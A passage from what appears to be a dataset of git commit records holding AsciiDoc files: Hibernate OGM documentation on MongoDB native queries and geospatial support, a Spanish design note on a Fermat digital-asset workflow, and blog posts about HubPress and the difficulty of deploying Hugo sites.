.list();\n----\n====\n\nNative queries can also be created using the `@NamedNativeQuery` annotation:\n\n.Using @NamedNativeQuery\n====\n[source, JAVA]\n----\n@Entity\n@NamedNativeQuery(\n name = \"AthanasiaPoem\",\n query = \"{ $and: [ { name : 'Athanasia' }, { author : 'Oscar Wilde' } ] }\",\n resultClass = Poem.class )\npublic class Poem { ... }\n\n...\n\n\/\/ Using the EntityManager\nPoem poem1 = (Poem) em.createNamedQuery( \"AthanasiaPoem\" )\n .getSingleResult();\n\n\/\/ Using the Session\nPoem poem2 = (Poem) session.getNamedQuery( \"AthanasiaPoem\" )\n .uniqueResult();\n----\n====\n\nHibernate OGM stores data in a natural way so you can still execute queries using the\nMongoDB driver, the main drawback is that the results are going to be raw MongoDB\ndocuments and not managed entities.\n\n[[ogm-mongodb-cli-syntax]]\n\n===== CLI Syntax\n\nHibernate OGM can execute native queries expressed using the MongoDB CLI syntax with some limitations.\nCurrently `find()`, `findOne()`, `findAndModify()`, and `count()` queries are supported. Furthermore, three\ntypes of write queries are supported via the CLI syntax: `insert()`, `remove()`, and `update()`. Other query\ntypes may be supported in future versions.\n\nAs one would expect, `find()`, `findOne()`, `findAndModify()`, `aggregate`,\n`distinct()`, and `count()` can be executed using\n`javax.persistence.Query.getSingleResult()` or `javax.persistence.Query.getResultList()`, while `insert()`,\n`remove()`, and `update()` require using `javax.persistence.Query.executeUpdate()`. Also note that,\n`javax.persistence.Query.executeUpdate()` may return `-1` in case execution of a query was not acknowledged\nrelative to the write concern used.\nVia `javax.persistence.Query.executeUpdate()` it is also possible to run `db.Collection.drop()`\nqueries.\n\n[NOTE]\n====\n`db.Collection.drop()` will always return 1. This is because the underlying driver we are\nusing doesn't return any value after the execution of the operation.\n====\n\n\nThe following functions can be used in the provided JSON:\n`BinData`, `Date`, `HexData`, `ISODate`, `NumberLong`, `ObjectId`, `Timestamp`,\n`RegExp`, `DBPointer`, `UUID`, `GUID`, `CSUUID`, `CSGUID`, `JUUID`, `JGUID`, `PYUUID`, `PYGUID`.\n\n[NOTE]\n====\n`NumberInt` is not supported as it is currently not supported by the MongoDB Java driver.\n====\n\nNo cursor operations such as `sort()` are supported.\nInstead use the corresponding MongoDB http:\/\/docs.mongodb.org\/manual\/reference\/operator\/query-modifier\/[query modifiers]\nsuch as `$orderby` within the criteria parameter.\n\nYou can limit the results of a query using the `setMaxResults(...)` method.\n\nJSON parameters passed via the CLI syntax must be specified using the\nhttp:\/\/docs.mongodb.org\/manual\/reference\/mongodb-extended-json\/[strict mode].\nSpecifically, keys need to be given within quotes; the only relaxation of this is that single quotes\nmay be used when specifying attribute names\/values to facilitate embedding queries within\nJava strings.\n\nNote that results of projections are returned as retrieved from the MongoDB driver at the moment and\nare not (yet) converted using suitable Hibernate OGM type implementations.\nThis requirement is tracked under https:\/\/hibernate.atlassian.net\/browse\/OGM-1031[OGM-1031].\n\n.CLI syntax examples\n====\n[source, JAVA]\n----\n\n\/\/ Valid syntax\nString valid = \"db.Poem.find({ \\\"name\\\" : \\\"Athanasia\\\" })\";\n\nString alsoValid = \"db.Poem.find({ '$or' : [{'name': 'Athanasia' }, {'name': 'Portia' }]})\";\n\nString validAggregation = \"db.Poem.aggregate([{ '$match': {'author': { '$regex': 'oscar.*', '$options': 'i' } } }, { '$sort': {'name': -1 } } ])\";\n\n\/\/ NOT Valid syntax, it will throw an exception: com.mongodb.util.JSONParseException\nString notValid = \"db.Poem.find({ name : \\\"Athanasia\\\" })\";\n\nString alsoNotValid = \"db.Poem.find({ $or : [{name: 'Athanasia' }, {name: 'Portia' }]})\";\n\n----\n====\n\n.CLI syntax sort and limit results alternatives\n====\n[source, JAVA]\n----\nString nativeQuery = \"db.Poem.find({ '$query': { 'author': 'Oscar Wilde' }, '$orderby' : { 'name' : 1 } })\";\n\n\/\/ Using hibernate session\nList<Poem> result = session.createNativeQuery( nativeQuery )\n\t.addEntity( Poem.class )\n\t.setMaxResults( 2 )\n\t.list();\n\n\/\/ Using JPA entity manager\nList<Poem> results = em.createNativeQuery( nativeQuery, Poem.class )\n\t.setMaxResults( 2 )\n\t.getResultList();\n----\n====\n\n.CLI syntax update examples\n====\n[source, JAVA]\n----\nString updateQuery = \"db.Poem.findAndModify({ 'query': {'_id': 1}, 'update': { '$set': { 'author': 'Oscar Wilde' } }, 'new': true })\";\nList<Poem> updated = session.createNativeQuery( updateQuery ).addEntity( Poem.class ).list();\n\nString insertQuery = \"db.Poem.insert({ '_id': { '$numberLong': '11' }, 'author': 'Oscar Wilder', 'name': 'The one and wildest', 'rating': '1' } )\";\nint inserted = session.createNativeQuery( insertQuery ).executeUpdate();\n\nString removeQuery = \"db.Poem.remove({ '_id': { '$numberLong': '11' } })\";\nint removed = session.createNativeQuery( removeQuery ).executeUpdate();\n----\n====\n\n[WARNING]\n====\nSupport for the `$regexp` operator is limited to the string syntax. We do not support the `\/pattern\/` syntax as it is not\ncurrently supported by the MongoDB Java driver.\n\n[source, JAVA]\n----\n\/\/ Valid syntax\nString nativeQuery = \"{ $query : { author : { $regex : '^Oscar' } }, $orderby : { name : 1 } }\";\nList<Poem> result = session.createNativeQuery( nativeQuery ).addEntity( Poem.class ).list();\n----\n====\n\n[[ogm-mongodb-stored-proc-native]]\n\n==== Server-side JavaScript and stored procedures\n\n[NOTE]\n====\nThis is an experimental feature.\n====\n\nIn MongoDB, it is possible to call server-side JavaScript as if it is a stored procedure.\nYou can use the existing methods in JPA:\n\n.Calling server-side JavaScript with positional parameters\n====\n[source, JAVA]\n----\n @Entity\n public class Car {\n @Id\n private Integer id;\n\n private String brand;\n\n ...\n }\n\n EntityManager em = ...\n StoredProcedureQuery storedProcedureQuery = em.createStoredProcedureQuery( \"findMostExpensiveCars\", Car.class );\n storedProcedureQuery.registerStoredProcedureParameter( \"year\", Integer.class, ParameterMode.IN );\n storedProcedureQuery.setParameter( \"year\", 1995 );\n List<Car> cars = storedProcedureQuery.getResultList();\n----\n====\n\nThis example will work assuming that there is a `findMostExpensiveCars` JavaScript function in MongoDB \nand that the result of the function is a list of cars that can be mapped to the `Car` entity.\n\n.Calling server-side JavaScript with Hibernate OGM with positional parameters\n====\n[source, JSON]\n----\n{\n \"result\" : [\n { \"id\":1, \"brand\":\"Bentley\" },\n { \"id\":2, \"brand\":\"Maserati\" },\n ]\n}\n----\n====\n\nMore details about server-side functions can be found in\nhttps:\/\/docs.mongodb.com\/manual\/core\/server-side-JavaScript[the MongoDB reference documentation].\n\n==== Hibernate Search\n\nYou can index your entities using Hibernate Search.\nThat way, a set of secondary indexes independent of MongoDB is maintained by Hibernate Search\nand you can run Lucene queries on top of them.\nThe benefit of this approach is a nice integration at the JPA \/ Hibernate API level\n(managed entities are returned by the queries).\nThe drawback is that you need to store the Lucene indexes somewhere\n(file system, infinispan grid, etc).\nHave a look at the Infinispan section (<<ogm-infinispan-indexstorage>>)\nfor more info on how to use Hibernate Search.\n\n=== Geospatial support\n\n==== Geospatial fields\n\nOur MongoDB integration supports the ability to declare geospatial fields by using specific Java types that will be\nautomatically converted to GeoJSON objects stored in MongoDB.\n\nWe currently support the following types:\n\n * `GeoPoint`, stored as a GeoJSON Point\n * `GeoMultiPoint`, stored as a GeoJSON MultiPoint\n * `GeoLineString`, stored as a GeoJSON LineString\n * `GeoMultiLineString`, stored as a GeoJSON MultiLineString\n * `GeoPolygon`, stored as a GeoJSON Polygon\n * `GeoMultiPolygon`, stored as a GeoJSON MultiPolygon\n\nYou can find more information about these types and their constraints in the\nhttps:\/\/docs.mongodb.com\/manual\/reference\/geojson\/[MongoDB documentation].\n\n.Declaring a geospatial field\n====\n[source, JAVA]\n----\n@Entity\npublic class Restaurant {\n\n \/\/ [...]\n\n private GeoPoint location;\n}\n----\n====\n\nThese Java types come with handy constructors and helpers to help manipulate them.\n\n.Instantiating a polygon\n====\n[source, JAVA]\n----\nGeoPolygon polygon = new GeoPolygon(\n new GeoPoint( 4.814922, 45.7753612 ),\n new GeoPoint( 4.8160825, 45.7327172 ),\n new GeoPoint( 4.9281299, 45.7211302 ),\n new GeoPoint( 4.8706127, 45.786724 ),\n new GeoPoint( 4.814922, 45.7753612 )\n);\n----\n====\n\n==== Geospatial indexes and queries\n\nTo be able to run optimized queries on geospatial fields, you need to declare spatial indexes.\n\nYou can leverage your usual annotations to declare the indexes directly on your entities.\n\n.Declaring a geospatial index\n====\n[source, JAVA]\n----\n@Entity\n@Table(indexes = {\n\t\t@Index(columnList = \"location\", name = \"location_spatial_idx\")\n})\n@IndexOptions(\n\t\t@IndexOption(forIndex = \"location_spatial_idx\", options = \"{ _type: '2dsphere' }\")\n)\npublic class Restaurant {\n\n \/\/ [...]\n\n private GeoPoint location;\n}\n----\n====\n\nNote that you need to precise the type of the index using an `@IndexOption` annotation.\n\nThe next step is to execute a geospatial query using a native query.\n\n.Finding entities around a point\n====\n[source, JAVA]\n----\nGeoPoint geoPoint = new GeoPoint( 4.8520035, 45.7498209 );\n\nQuery query = session\n .createNativeQuery( \"{ location: { $near: { $geometry: \" + geoPoint.toBsonDocument() + \", $maxDistance: 500 } } }\" )\n .addEntity( Restaurant.class );\nList<Restaurant> result = query.list();\n----\n====\n\n.Finding entities within a polygon\n====\n[source, JAVA]\n----\nGeoPolygon geoPolygon = new GeoPolygon(\n new GeoPoint( 4.814922, 45.7753612 ),\n new GeoPoint( 4.8160825, 45.7327172 ),\n new GeoPoint( 4.9281299, 45.7211302 ),\n new GeoPoint( 4.8706127, 45.786724 ),\n new GeoPoint( 4.814922, 45.7753612 )\n);\n\nQuery query = session\n .createNativeQuery( \"{ location: { $geoWithin: { $geometry: \" + geoPolygon.toBsonDocument() + \" } } }\" )\n .addEntity( Restaurant.class );\nList<Restaurant> result = query.list();\n----\n====\n\nTo learn more about MongoDB spatial indexes and queries, please refer to the\nhttps:\/\/docs.mongodb.com\/manual\/geospatial-queries\/[MongoDB documentation].\n","returncode":0,"stderr":"","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"fd28b6633f390a1e8fc4f002f1e7065b99b094b8","subject":"Documentacion DAP","message":"Documentacion DAP\n","repos":"fvasquezjatar\/fermat-unused,fvasquezjatar\/fermat-unused","old_file":"fermat-documentation\/fermat_dap\/flujo_general\/version1.asciidoc","new_file":"fermat-documentation\/fermat_dap\/flujo_general\/version1.asciidoc","new_contents":"[line-through]#[[flujo-general-BitDubai-V1]]\n\n= Flujo General de la Plataform DAP\n\n= Flujo Desarrollo\n\nEl flujo de desarrollo del Asset describe lo necesario para generar un Digital Asset.\nEl objeto DigitalAsset de la plataforma, contar\u00e1 con las siguientes propiedades:\n\n * Identity Asset Issuer: Identity del Actor AssetIssuer\n * String name: nombre del Asset definido por el issuer.\n * String description: descripci\u00f3n del asset definido por el issuer.\n * List<Resource>: lista de recursos posibles del asset, como por ejemplo im\u00e1genes, videos, etc.\n * String GenesisTransaction: hash de la transacci\u00edn bitcoin donde el asset est\u00e1 incluido.\n * Address GenesisAddress: direcci\u00f3n Genesis generada por la Asset Vault\n * long GenesisAmount: valor crypto del digital asset en Satoshis.\n\nComo contrato b\u00e1sico para el Digital Asset para poder cerrar el ciclo en el desarrollo inicial de la plataforma,\nespecificaremos que:\n\n * Redimible\n * ExpirationDate: fecha de expiraci\u00f3n que puede ser nunca.\n\nUna vez completadas estas propiedades por parte del Issuer, y cerrado y decidido a crear el Digital Asset sin m\u00e1s cambios,\nla Asset Issuer subApp, inicia una Digital Asset Transaction de Asset Issuing en la que lo siguiente ocurre:\n\n* Se solicita a la Crypto Vault la creaci\u00f3n de una transaction bitcoin la cual devuelve un hash. Este hash se define como la GenesisTransaction\nen el Digital Asset.\n* Se solicita a la Asset Vault una direcci\u00f3n bitcoin que ser\u00e1 la GenesisAddress\n* Se completa la crypto transacci\u00f3n especificando el GenesisAmount.\n* Se ejecuta un hash del Digital Asset y el mismo se coloca en el OP_OUTPUT de la crypto transacci\u00f3n.\n* Se commitea la transacci\u00f3n y la misma es publicada a la red de bitcoin a trav\u00e9s de la Crypto Network.\n* El Digital Asset es considerado creado y cerrado.\n\n\n[Manuel completar m\u00e1s info de la transacci\u00f3n]\n\nRealizadas estas operaciones, y al momento de recibir el GenesisAmount en la Asset Vault, las operaciones de cr\u00e9dito dentro de la\nAsset Wallet deben ocurrir.\n\n * Registro en Asset Issuer Wallet\n\nEs importante mencionar que este proceso realizara una transaccion contable al Asset del Issuer, aumentando la cantidad de Asset originado por el Asset en su creacion,\npara que cuando sea enviado a un Asset User, le sea debitado dicho asset a la wallet Issuet y acreditados a la walletAsset User, de esta forma podriamos conocer cuantos Asset de ese tipo\nhan sido creados y estan disponible para su envio, todo esta operacion debe ser originado mediante una transaccion de la capa transaction.\n\n* Registro en Asset User Wallet\n\nEste proceso realizara una transaccion contable a la wallet Asset del User, aumentando la cantidad de Asset User enviado por el Asset Issuer, y acreditando dicho asset a la wallet Issuet,\nde esta forma podriamos conocer cuantos Asset de ese tipo tiene disponible el Aset User para su intercambio, todo esta operacion debe ser originado mediante una transaccion\nde la capa transaction.\n\n* Registro en Redeem Point Wallet\n\nEste proceso determina el intercambio de la wallet Asset User donde mediante un metodo donde se pase las direcciones correspondiente se realizara una transaccion contable a la Asset del User, disminuyendo la cantidad de la wallet Asset User,\ny acreditando o retornando dicho asset a la Asset Issuer en punto Reddem Point o en alguna wallet que determine la Redemcion.\nAclarar que pasa con este Asset si se puede volver a enviar.\nUna vez verificada la genesis transaction por parte del Redeem Point, se debe notificar al plugin Outgoing Issuer que debe realizar la transferencia del monto crypto asociado\na la genesis transaction hac\u00eda el dispositivo que va a recibir el digital asset para su \"redemci\u00f3n\". Una vez que se produzca la transferencia del monto del Digital Asset\nel dispositivo del beneficiero del asset debe proceder a registrar el consumo del mencionado Asset y proceder a su inhabilitaci\u00f3n (\u00bf?) del dispositivo y registrarlo como consumido.\n\n\n\n= Funciones del Asset Issuing\n\nEl plugin Asset Issuing ser\u00e1 el encargado de la creaci\u00f3n de los Assets, incluyendo metadata y crypto monto, que posteriormente ser\u00e1n enviados a los posibles destinatarios de los Digital Assets. Este plugin\ndeber\u00e1 solicitar la genesis transaction, la cual se define como la transacci\u00f3n origen de los crypto montos a ser transferidos junto al asset, as\u00ed mismo, debe solicitar\nla genesis address, la cual se define como la direcci\u00f3n que emiti\u00f3 el Asset. Una vez obtenida la informaci\u00f3n antes mencionada, este plugin debe crear las transacciones que\npermitan la transferencia de los Assets a los destinatarios. Este plugin debe ser responsable de cada uno de los Assets generados hasta que todos hayan sido entregados a los\ndestinatarios. Este plugin debe tener la capacidad de monitorear que Asset ha sido entregado y registrarlo (aun no veo donde) para su posterior consumo. Si un asset no ha\nsido registrado como entregado por este plugin, ese Asset no deber\u00eda ser consumido por el beneficiario.\nEstos Assets pueden ser enviados a cualquier tipo de wallet, es decir, debe ser transparente para este plugin los destinatarios de los assets, la metadata que se entrega a\n este plugin debe incluir la informaci\u00f3n que permita discriminar a que tipo de wallet\/destinatario va dirigido el Asset, este proceso de filtrado podr\u00eda tomarse de las wallets\n instaladas actualmente, este plugin debe recibir de una capa superior el criterio de selecci\u00f3n de los destinatarios, de tal forma que este pueda crear la transaci\u00f3n que permita\n enviar el asset al destinatario.\nLos Assets que no se hayan enviado deben permanecer en el dispositivo emisor hasta que el beneficiario haya autorizado la instalaci\u00f3n\/descarga del digital asset\na su dispositivo. Al momento de instalaci\u00f3n del Asset en el dispositivo destino es que se debe realizar la trasferencia del crypto monto al dispositivo destino.\nLos crypto montos del emisor asociados a cada assets deben estar reservados en el dispositivo emisor hasta que sean transferidos a los beneficiarios. Estos montos no deben\ncambiar una vez reservados.\n\n*Preguntar al team:*\n\u00bfEs posible que el emisor elimine\/cancele un asset a discreci\u00f3n?\n\n= Transferencia y confirmaci\u00f3n de Asset a beneficiario\n\n= Notificaci\u00f3n en Incoming Issuer\n\nEl plugin Incoming Issuer en el lado del consumidor o beneficiario ser\u00e1 el encargado de monitorear la existencia de un Digital Asset (de alguna manera, por definir) que est\u00e9 dirigido para la Asset Wallet del usuario,\nen caso de recibir la notificaci\u00f3n de la existencia de un Digital Asset, este plugin deber\u00e1 verificar la metadata que debe estar incluida en el Asset, esta comprobaci\u00f3n debe\nincluir la verificaci\u00f3n de la genesis Transaction, con lo cual se puede verificar el origen del Asset.\nUna vez verificado el origen del Asset, el plugin debe lanzar\u00e1 una notificaci\u00f3n a una capa superior para que el usuario est\u00e9 en cuenta de la existencia de este Asset.\nEs de hacer notar que hasta el momento, se piensa que el usuario va a autorizar si el Asset va a ser descargado en el dispositivo, esto podr\u00eda cambiar en un futuro,\nya que se plantea que este Asset puede estar \"pre-instalado\" en el dispositivo. Se podr\u00eda definir varias posibles condiciones de descarga de un Asset:\n * descargable autom\u00e1ticamente (el Issuer la instala autom\u00e1ticamente en las Asset Wallets destino)\n * descargable por autorizaci\u00f3n del usuario.\n * preinstalada en la Asset Wallet.\nUna vez que la Asset Wallet autoriza la instalaci\u00f3n o descarga del Digital Asset, se procede a crear la transacci\u00f3n que va a transferir el monto crypto asociado a la metadata\nde la genesis transaction a la Asset Vault del destinatario. Una vez realizada correctamente la transferencia de fondos, se debe notificar a las capas que controlan la UI la\ncorrecta instalaci\u00f3n\/descarga del Asset.\n\n*Preguntar al team*:\n\u00bfUn asset puede ser descargado o instalado por alg\u00fan otro medio distinto a la red de fermat? \u00bfSe podr\u00eda recibir v\u00eda c\u00f3digo QR?\n\n\n#","old_contents":"[line-through]#[[flujo-general-BitDubai-V1]]\n\n= Flujo General de la Plataform DAP\n\n\nEl actor ISSUER procede a crear el Asset donde colocara la informacion relevante:\n\n * Tienen un Emisor, que es alguno de los actores del sistema.\n * Tienen una fecha de expiraci\u00f3n. (aunque en algunos casos puede ser que no expiren nunca)\n * Tienen uno o mas elementos multi-media (imagen, sonido, video, animaci\u00f3n, etc.) destinados a\n representar ante el usuario final dicho asset.\n * Son de un determinado tipo.\n * Pueden ser redimido.\n * Tienen una lista de condiciones que dependen de su tipo. (Las entienden cualquier wallet que maneje\n ese tipo de Assets)\n * Son de un determinado sub-tipo.\n * Tienen una lista de condiciones que dependen de su sub-tipo. (Las entienden cualquier wallet que\n maneje ese sub-tipo de Assets)\n * Tienen una lista de condiciones que dependen de su emisor. (Solo las entienden las wallets del emisor)\n\nEl Issuer determinara en que momento el Asset estara disponible para su envio o publicacion a las Wallets\ninstaladas en otros dispositivos y de manera asincrona comenzara la instalacion del Asset, siempre y\ncuando se haya validado algunas informacion tecnica del Asset, por ejemplo que no haya caducado,\nel actor User, debera de una manera aceptar\nel Asset recibido.\n\nDeberiamos de buscar la manera de saber el codigo de la billetera para proceder a enviar el asset.\n\nInteracion y Flujo de pluggin, subapp, explicacion.\n\n= Flujo Desarrollo\n\nEl flujo de desarrollo del Asset describe lo necesario para generar un Digital Asset.\nEl objeto DigitalAsset de la plataforma, contar\u00e1 con las siguientes propiedades:\n\n * Identity Asset Issuer: Identity del Actor AssetIssuer\n * String name: nombre del Asset definido por el issuer.\n * String description: descripci\u00f3n del asset definido por el issuer.\n * List<Resource>: lista de recursos posibles del asset, como por ejemplo im\u00e1genes, videos, etc.\n * String GenesisTransaction: hash de la transacci\u00edn bitcoin donde el asset est\u00e1 incluido.\n * Address GenesisAddress: direcci\u00f3n Genesis generada por la Asset Vault\n * long GenesisAmount: valor crypto del digital asset en Satoshis.\n\nComo contrato b\u00e1sico para el Digital Asset para poder cerrar el ciclo en el desarrollo inicial de la plataforma,\nespecificaremos que:\n\n * Redimible\n * ExpirationDate: fecha de expiraci\u00f3n que puede ser nunca.\n\nUna vez completadas estas propiedades por parte del Issuer, y cerrado y decidido a crear el Digital Asset sin m\u00e1s cambios,\nla Asset Issuer subApp, inicia una Digital Asset Transaction de Asset Issuing en la que lo siguiente ocurre:\n\n* Se solicita a la Crypto Vault la creaci\u00f3n de una transaction bitcoin la cual devuelve un hash. Este hash se define como la GenesisTransaction\nen el Digital Asset.\n* Se solicita a la Asset Vault una direcci\u00f3n bitcoin que ser\u00e1 la GenesisAddress\n* Se completa la crypto transacci\u00f3n especificando el GenesisAmount.\n* Se ejecuta un hash del Digital Asset y el mismo se coloca en el OP_OUTPUT de la crypto transacci\u00f3n.\n* Se commitea la transacci\u00f3n y la misma es publicada a la red de bitcoin a trav\u00e9s de la Crypto Network.\n* El Digital Asset es considerado creado y cerrado.\n\n\n[Manuel completar m\u00e1s info de la transacci\u00f3n]\n\nRealizadas estas operaciones, y al momento de recibir el GenesisAmount en la Asset Vault, las operaciones de cr\u00e9dito dentro de la\nAsset Wallet deben ocurrir.\n\n * Registro en Asset Issuer Wallet\n\nEs importante mencionar que este proceso realizara una transaccion contable al Asset del Issuer, aumentando la cantidad de Asset originado por el Asset en su creacion,\npara que cuando sea enviado a un Asset User, le sea debitado dicho asset a la wallet Issuet y acreditados a la walletAsset User, de esta forma podriamos conocer cuantos Asset de ese tipo\nhan sido creados y estan disponible para su envio, todo esta operacion debe ser originado mediante una transaccion de la capa transaction.\n\n* Registro en Asset User Wallet\n\nEste proceso realizara una transaccion contable a la wallet Asset del User, aumentando la cantidad de Asset User enviado por el Asset Issuer, y acreditando dicho asset a la wallet Issuet,\nde esta forma podriamos conocer cuantos Asset de ese tipo tiene disponible el Aset User para su intercambio, todo esta operacion debe ser originado mediante una transaccion\nde la capa transaction.\n\n* Registro en Redeem Point Wallet\n\nEste proceso determina el intercambio de la wallet Asset User donde mediante un metodo donde se pase las direcciones correspondiente se realizara una transaccion contable a la Asset del User, disminuyendo la cantidad de la wallet Asset User,\ny acreditando o retornando dicho asset a la Asset Issuer en punto Reddem Point o en alguna wallet que determine la Redemcion.\nAclarar que pasa con este Asset si se puede volver a enviar.\nUna vez verificada la genesis transaction por parte del Redeem Point, se debe notificar al plugin Outgoing Issuer que debe realizar la transferencia del monto crypto asociado\na la genesis transaction hac\u00eda el dispositivo que va a recibir el digital asset para su \"redemci\u00f3n\". Una vez que se produzca la transferencia del monto del Digital Asset\nel dispositivo del beneficiero del asset debe proceder a registrar el consumo del mencionado Asset y proceder a su inhabilitaci\u00f3n (\u00bf?) del dispositivo y registrarlo como consumido.\n\n\n\n= Funciones del Asset Issuing\n\nEl plugin Asset Issuing ser\u00e1 el encargado de la creaci\u00f3n de los Assets, incluyendo metadata y crypto monto, que posteriormente ser\u00e1n enviados a los posibles destinatarios de los Digital Assets. Este plugin\ndeber\u00e1 solicitar la genesis transaction, la cual se define como la transacci\u00f3n origen de los crypto montos a ser transferidos junto al asset, as\u00ed mismo, debe solicitar\nla genesis address, la cual se define como la direcci\u00f3n que emiti\u00f3 el Asset. Una vez obtenida la informaci\u00f3n antes mencionada, este plugin debe crear las transacciones que\npermitan la transferencia de los Assets a los destinatarios. Este plugin debe ser responsable de cada uno de los Assets generados hasta que todos hayan sido entregados a los\ndestinatarios. Este plugin debe tener la capacidad de monitorear que Asset ha sido entregado y registrarlo (aun no veo donde) para su posterior consumo. Si un asset no ha\nsido registrado como entregado por este plugin, ese Asset no deber\u00eda ser consumido por el beneficiario.\nEstos Assets pueden ser enviados a cualquier tipo de wallet, es decir, debe ser transparente para este plugin los destinatarios de los assets, la metadata que se entrega a\n este plugin debe incluir la informaci\u00f3n que permita discriminar a que tipo de wallet\/destinatario va dirigido el Asset, este proceso de filtrado podr\u00eda tomarse de las wallets\n instaladas actualmente, este plugin debe recibir de una capa superior el criterio de selecci\u00f3n de los destinatarios, de tal forma que este pueda crear la transaci\u00f3n que permita\n enviar el asset al destinatario.\nLos Assets que no se hayan enviado deben permanecer en el dispositivo emisor hasta que el beneficiario haya autorizado la instalaci\u00f3n\/descarga del digital asset\na su dispositivo. Al momento de instalaci\u00f3n del Asset en el dispositivo destino es que se debe realizar la trasferencia del crypto monto al dispositivo destino.\nLos crypto montos del emisor asociados a cada assets deben estar reservados en el dispositivo emisor hasta que sean transferidos a los beneficiarios. Estos montos no deben\ncambiar una vez reservados.\n\n*Preguntar al team:*\n\u00bfEs posible que el emisor elimine\/cancele un asset a discreci\u00f3n?\n\n= Transferencia y confirmaci\u00f3n de Asset a beneficiario\n\n= Notificaci\u00f3n en Incoming Issuer\n\nEl plugin Incoming Issuer en el lado del consumidor o beneficiario ser\u00e1 el encargado de monitorear la existencia de un Digital Asset (de alguna manera, por definir) que est\u00e9 dirigido para la Asset Wallet del usuario,\nen caso de recibir la notificaci\u00f3n de la existencia de un Digital Asset, este plugin deber\u00e1 verificar la metadata que debe estar incluida en el Asset, esta comprobaci\u00f3n debe\nincluir la verificaci\u00f3n de la genesis Transaction, con lo cual se puede verificar el origen del Asset.\nUna vez verificado el origen del Asset, el plugin debe lanzar\u00e1 una notificaci\u00f3n a una capa superior para que el usuario est\u00e9 en cuenta de la existencia de este Asset.\nEs de hacer notar que hasta el momento, se piensa que el usuario va a autorizar si el Asset va a ser descargado en el dispositivo, esto podr\u00eda cambiar en un futuro,\nya que se plantea que este Asset puede estar \"pre-instalado\" en el dispositivo. Se podr\u00eda definir varias posibles condiciones de descarga de un Asset:\n * descargable autom\u00e1ticamente (el Issuer la instala autom\u00e1ticamente en las Asset Wallets destino)\n * descargable por autorizaci\u00f3n del usuario.\n * preinstalada en la Asset Wallet.\nUna vez que la Asset Wallet autoriza la instalaci\u00f3n o descarga del Digital Asset, se procede a crear la transacci\u00f3n que va a transferir el monto crypto asociado a la metadata\nde la genesis transaction a la Asset Vault del destinatario. Una vez realizada correctamente la transferencia de fondos, se debe notificar a las capas que controlan la UI la\ncorrecta instalaci\u00f3n\/descarga del Asset.\n\n*Preguntar al team*:\n\u00bfUn asset puede ser descargado o instalado por alg\u00fan otro medio distinto a la red de fermat? \u00bfSe podr\u00eda recibir v\u00eda c\u00f3digo QR?\n\n\n#","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"b0a7c8ac16f126b585eafa20ffde0c9005bbcf10","subject":"Update 2016-05-27-My-First-Post-with-Hub-Press.adoc","message":"Update 2016-05-27-My-First-Post-with-Hub-Press.adoc","repos":"thezorgan\/thezorgan.github.io,thezorgan\/thezorgan.github.io,thezorgan\/thezorgan.github.io,thezorgan\/thezorgan.github.io","old_file":"_posts\/2016-05-27-My-First-Post-with-Hub-Press.adoc","new_file":"_posts\/2016-05-27-My-First-Post-with-Hub-Press.adoc","new_contents":"= My First Post with HubPress\n:hp-tags: hubpress, test, new\n:hp-image: students-703001_1920.jpg\n\nI kindly ask you to shoot an email to help@about.me with the subject \"Namecheap +About.me\". Please add your about.me username and zorgan.me domain to the email.","old_contents":"= My First Post with HubPress\n:hp-tags: hubpress\n:hp-image: notebook-405755_1280.jpg\n\nI kindly ask you to shoot an email to help@about.me with the subject \"Namecheap +About.me\". Please add your about.me username and zorgan.me domain to the email.","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"f667948f07b38fc956d375de5332ab6d3904d763","subject":"Update 2016-09-04-Hugo-No-Go-Felicitous-Update.adoc","message":"Update 2016-09-04-Hugo-No-Go-Felicitous-Update.adoc","repos":"bretonio\/bretonio.github.io,bretonio\/bretonio.github.io,bretonio\/bretonio.github.io,bretonio\/bretonio.github.io","old_file":"_posts\/2016-09-04-Hugo-No-Go-Felicitous-Update.adoc","new_file":"_posts\/2016-09-04-Hugo-No-Go-Felicitous-Update.adoc","new_contents":"= Hugo: No Go (Felicitous Update)\n:hp-tags: front-end, github, hugo, static site generator, hosting, push, workflow, automation, themes, deployment\n\nMy Hugo experience has been really frustrating. I guess https:\/\/discuss.gohugo.io\/t\/i-am-really-confused-as-to-how-to-deploy-hugo-with-github\/3669\/7[I am not the only one].\n\n**(You can skip all the whining and scroll down to where Surge turns out to be a very satisfactory partial solution. --Editor)**\n\nWith Hugo, I am able to build and serve locally all manner of remarkable sites with ease. It rocks. It rolls. It has an great big and extremely creative community.\n\nBut I just cannot seem to deploy these sites, to GitHub Pages or anywhere else.\n\nI have followed http:\/\/codethejason.github.io\/blog\/setupghpages\/[these instructions], and variants for deploying to a personal or org page.\n\nI have tested Netflify and Surge and am testing https:\/\/gohugo.io\/tutorials\/automated-deployments\/[Wercker] and https:\/\/travis-ci.org\/gringolalia\/gringolalia[Travis] and others. I am making a list. I am checking it twice. \n\nI have checked out a couple of https:\/\/github.com\/spencerlyon2\/hugo_gh_blog\/blob\/master\/deploy.sh[deploy scripts] as well, including http:\/\/heiber.im\/post\/switching-to-hugo\/[this one] for deploying to personal or org pages rather than project pages.\n\nimage::netlifyfailurescale.png[]\n\n=== Google Search & Deploy\n\nIn the case of Netflify and http:\/\/harmonious-advertisement.surge.sh\/[Surge], the deploy succeeds, but the theme is missing. Just raw HTML, though \tthere are folders and files for CCS, JS and SASS. \n\nWhen I build the site with `hugo --theme=ghostwriter` and upload it to my local Web server, same problem. \n\nI should not need to specify the stylesheet as it is in my `config.toml`\n\nStylesheets and other elements of style are present in the deployed `public\/` folder but the theme does not load. \n\nA fellow sufferer suggests removing the `.git` folder from the `themes\/ghostwriter` folder.\n\nTo no effect. I follow the Netflify tutorial and get the `no configuration file found` error.\t\n\n> 12:27:23 PM: Error running command: Build script returned non-zero exit code: 255\n\nI copy the `gringolalia` folder into one called `glossalia`, remove the `.git` folder, create a new project with that name on gringolalia@github and repeat `git init` and all that stuff.\n\nI really have to stop floundering and draw up a plan of attack. Hugo is a great tool with a wealth of themes to adapt and study, but I need to have time to actually write in https:\/\/brasilianas.github.io\/[these writing spaces I keep setting up for myself]. \n\nGhostwriter in Hugo is not *so* fantastic that I just have to have it in my portfolio. But I do like it.\n\nI want to write criticism and essays in the genre of Camus and a cheap spy novel about money laundering and Uruguay and Paraguay. I have https:\/\/brasilianas.github.io\/[a thing about Paraguay], this is true. I explain it https:\/\/gringolalia.surge.sh\/2016\/09\/07\/porque-sambodia\/[here, in 